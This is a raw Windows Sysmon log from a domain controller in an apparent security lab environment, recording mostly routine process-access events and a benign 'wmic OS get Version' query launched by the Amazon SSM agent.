09:20:18.786{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053650Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:18.786{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053649Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:18.786{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053648Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:18.786{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053647Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:18.775{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD2-6151-4800-00000000FD01}3940C:\Windows\System32\Wbem\wmic.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+54c6|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053646Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:18.763{5EBD8912-8CD2-6151-4700-00000000FD01}38483868C:\Windows\system32\conhost.exe{5EBD8912-8CD2-6151-4800-00000000FD01}3940C:\Windows\System32\Wbem\wmic.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053645Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:18.760{5EBD8912-8CBD-6151-0500-00000000FD01}416500C:\Windows\system32\csrss.exe{5EBD8912-8CD2-6151-4800-00000000FD01}3940C:\Windows\System32\Wbem\wmic.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001053644Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:18.760{5EBD8912-8CD2-6151-4300-00000000FD01}37603936C:\Program Files\Amazon\SSM\ssm-agent-worker.exe{5EBD8912-8CD2-6151-4800-00000000FD01}3940C:\Windows\System32\Wbem\wmic.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\Amazon\SSM\ssm-agent-worker.exe+6f23e 154100x80000000000000001053643Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:18.749{5EBD8912-8CD2-6151-4800-00000000FD01}3940C:\Windows\System32\wbem\WMIC.exe10.0.14393.0 (rs1_release.160715-1616)WMI Commandline UtilityMicrosoft® Windows® Operating SystemMicrosoft Corporationwmic.exewmic OS get Version /format:listC:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-8CBD-6151-E703-000000000000}0x3e70SystemMD5=2CEE7F1AD77D8817E0F043E5E5ED1C83,SHA256=6679EA8FBEB539B5852CE8838420471FED0600F5050F3370DBB355DAC76BF072,IMPHASH=1B1A3F43BF37B5BFE60751F2EE2F326E{5EBD8912-8CD2-6151-4300-00000000FD01}3760C:\Program Files\Amazon\SSM\ssm-agent-worker.exe"C:\Program Files\Amazon\SSM\ssm-agent-worker.exe" 10341000x80000000000000001053642Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:18.665{5EBD8912-8CD2-6151-4700-00000000FD01}38483868C:\Windows\system32\conhost.exe{5EBD8912-8CD2-6151-4300-00000000FD01}3760C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053641Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:18.665{5EBD8912-8CBD-6151-0500-00000000FD01}416500C:\Windows\system32\csrss.exe{5EBD8912-8CD2-6151-4700-00000000FD01}3848C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001053640Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:18.664{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053639Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:18.664{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053638Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:18.662{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053637Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:18.662{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053636Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:18.662{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053635Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:18.662{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053634Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:18.662{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053633Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:18.662{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053632Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:18.662{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053631Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:18.662{5EBD8912-8CBD-6151-0500-00000000FD01}416432C:\Windows\system32\csrss.exe{5EBD8912-8CD2-6151-4300-00000000FD01}3760C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001053630Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:18.662{5EBD8912-8CD0-6151-2F00-00000000FD01}25442328C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe{5EBD8912-8CD2-6151-4300-00000000FD01}3760C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe+6ed7e 154100x80000000000000001053629Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:18.422{5EBD8912-8CD2-6151-4300-00000000FD01}3760C:\Program Files\Amazon\SSM\ssm-agent-worker.exe-----"C:\Program Files\Amazon\SSM\ssm-agent-worker.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-8CBD-6151-E703-000000000000}0x3e70SystemMD5=26B76A159CC149F82352B4A99601043A,SHA256=B7EF09E159A17072EF7A93D8B1369902C851B5C40404F44EB802A83131708B2F,IMPHASH=4035D2883E01D64F3E7A9DCCB1D63AF5{5EBD8912-8CD0-6151-2F00-00000000FD01}2544C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe"C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe" 10341000x80000000000000001053628Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:18.646{5EBD8912-8CD1-6151-3500-00000000FD01}34363456C:\Windows\system32\conhost.exe{5EBD8912-8CD2-6151-4600-00000000FD01}3828C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053627Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:18.646{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053626Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:18.646{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053625Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:18.646{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053624Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:18.646{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053623Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:18.646{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053622Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 